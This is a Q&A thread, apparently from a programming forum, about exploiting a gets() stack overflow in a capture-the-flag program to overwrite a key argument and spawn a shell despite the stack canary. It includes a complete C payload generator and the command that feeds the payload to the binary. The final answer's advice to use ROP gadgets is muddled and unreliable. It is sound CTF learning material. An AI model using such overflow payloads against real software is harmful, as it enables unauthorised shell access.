
Here is a simple CTF challenge with BOF exploiting.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void func(int key){
    char overflowme[32];        /* 32-byte stack buffer */
    printf("overflow me : ");
    gets(overflowme);           // smash me!  (gets() has no length limit, so input runs past the buffer)
    if(key == 0xcafebabe){      /* key is tested here, before the function returns */
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}                               /* the stack canary is only checked on return from func() */

int main(int argc, char* argv[]){
    func(0xdeadbeef);           /* key starts out as 0xdeadbeef */
    return 0;
}

Obviously gets is vulnerable here. But the target binary is compiled with canary code, so we cannot just overflow the buffer. We have to know the canary beforehand. How is it possible without a format string leak? The only way I see here is stupid brute force.

Roman
    As far as I remember, the stack canary check only runs when the function returns, so corrupting it should not prevent the shell from running. – w s Dec 09 '22 at 14:25
  • @ws That should be an answer, not a comment. – pppery Dec 15 '22 at 18:08
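As an added example (not code from the original question or its answers), the following C program builds the overflow payload for the program above and models why the canary does not get in the way. Input from gets() runs from overflowme upward through the canary, the saved frame pointer and the return address into the key argument, and the key comparison happens before the epilogue in which the canary is checked. The distance from overflowme to key (ASSUMED_KEY_OFF, 52 here) and the 32-bit frame layout it encodes are assumptions for illustration; read the real offset off the disassembly of func in your binary. simulate_func is a model of the frame, not the real stack, and the canary value in it is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed distance from the start of overflowme to the key argument.
 * In a typical 32-bit gcc build func's frame looks like
 *   [overflowme 32][pad][canary][saved ebp][return addr][key]
 * so key sits at (ebp - &overflowme) + 8.  The value 52 is a placeholder
 * for illustration: read the real offset from the disassembly of func. */
#define ASSUMED_KEY_OFF 52
#define BUF_SIZE        32
#define TARGET_KEY      0xcafebabeu
#define ORIG_KEY        0xdeadbeefu
#define MODEL_CANARY    0x7d3a9100u   /* constructed; glibc's is random with a 0 low byte */

static void put32(uint8_t *p, uint32_t v)          /* little-endian, as on x86 */
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

static uint32_t get32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Payload = key_off filler bytes, then the wanted key in little-endian order.
 * Returns the payload length, or 0 if the output buffer is too small. */
size_t build_payload(uint8_t *out, size_t cap, size_t key_off, uint32_t key)
{
    size_t len = key_off + 4;
    if (cap < len)
        return 0;
    memset(out, 'A', key_off);
    put32(out + key_off, key);
    return len;
}

struct outcome {
    int shell_spawned;  /* key == 0xcafebabe held when the comparison ran */
    int canary_intact;  /* 0 means the epilogue would abort: "stack smashing detected" */
};

/* Model of func()'s frame and of the order in which things happen inside it.
 * The frame is a flat byte array: buffer at offset 0, canary placed 12 bytes
 * below key (the exact position varies; it only matters that it sits between
 * the buffer and the key), then saved ebp, return address, key.  Input is
 * copied in without a bound, as gets() does, and NUL-terminated; the key
 * comparison runs before the canary comparison, as in func(). */
struct outcome simulate_func(const uint8_t *input, size_t in_len, size_t key_off)
{
    struct outcome r = { 0, 1 };
    if (key_off < BUF_SIZE + 12)
        return r;                       /* no room for canary/ebp/ret: bad model input */
    size_t frame_len = key_off + 4;
    size_t canary_off = key_off - 12;
    uint8_t *frame = calloc(frame_len, 1);
    if (!frame)
        return r;
    put32(frame + canary_off, MODEL_CANARY);
    put32(frame + key_off, ORIG_KEY);   /* main() passed 0xdeadbeef */

    size_t n = in_len < frame_len ? in_len : frame_len;   /* model stops at frame end */
    memcpy(frame, input, n);            /* gets(): no length check */
    if (n < frame_len)
        frame[n] = 0;                   /* gets() appends the terminating NUL */

    if (get32(frame + key_off) == TARGET_KEY)
        r.shell_spawned = 1;            /* system("/bin/sh") runs here, before return */
    r.canary_intact = get32(frame + canary_off) == MODEL_CANARY;  /* epilogue check */
    free(frame);
    return r;
}

/* Stand-alone use: write the payload to stdout, report the model on stderr. */
int main(void)
{
    uint8_t payload[ASSUMED_KEY_OFF + 4];
    size_t n = build_payload(payload, sizeof payload, ASSUMED_KEY_OFF, TARGET_KEY);
    struct outcome o = simulate_func(payload, n, ASSUMED_KEY_OFF);
    fprintf(stderr, "model: shell_spawned=%d canary_intact=%d\n",
            o.shell_spawned, o.canary_intact);
    return fwrite(payload, 1, n, stdout) == n ? 0 : 1;
}
```

Compile it as a normal program, run `./gen > payload`, and feed the target with `(cat payload; cat) | ./bof`; the trailing `cat` keeps stdin open so the spawned shell can read commands. On the real binary the smashed canary is only noticed in func's epilogue, so glibc's `*** stack smashing detected ***` abort appears after the shell exits and never blocks the exploit. If the offset is wrong, the model (and the real program) prints "Nah.." instead of giving a shell, which is the signal to recheck the disassembly.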

1 Answer


You can try bypassing the canary protection and exploiting the buffer overflow vulnerability using "return-oriented programming" (ROP). ROP allows you to execute arbitrary code by chaining together small snippets of code known as "gadgets" that are already present in the program's code or libraries.

You must locate a gadget that allows you to enter a value into the "key" argument of the "func" function. You can then use this gadget to insert the value 0xcafebabe into the "key" argument, thereby bypassing the canary check and invoking system("/bin/sh").

You can use a tool like "ROPgadget" or "Ropper" to find gadgets. These tools enable you to look for gadgets in a binary file or library and create ROP chains that can be used to exploit vulnerabilities.

EDIT: If you are unfamiliar with assembly language, it may be difficult to exploit using ROP.

raheel0x01